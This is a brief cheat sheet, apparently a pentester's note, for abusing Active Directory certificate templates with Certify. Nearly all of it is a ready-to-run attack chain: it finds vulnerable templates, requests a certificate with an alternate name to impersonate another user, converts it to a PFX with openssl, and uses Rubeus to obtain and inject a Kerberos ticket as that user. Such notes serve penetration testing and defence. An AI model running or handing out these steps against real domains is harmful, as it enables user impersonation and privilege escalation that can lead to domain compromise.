certify

A cool tool for investigating Active Directory certificate abuse.

Find all vulnerable certs

certify.exe find /vulnerable

Certify.exe request /ca:tt-dc01.tangent.town\tangent-TT-DC01-CA /template:4lewsers /altname:tommy

Now copy everything from...

-----BEGIN RSA PRIVATE KEY-----

...to...

-----END CERTIFICATE-----

Then save that to a file called cert.pem. Next:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

This will give you the cert.pfx file, which you can use to request a TGT with Rubeus:

Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /ptt /nowrap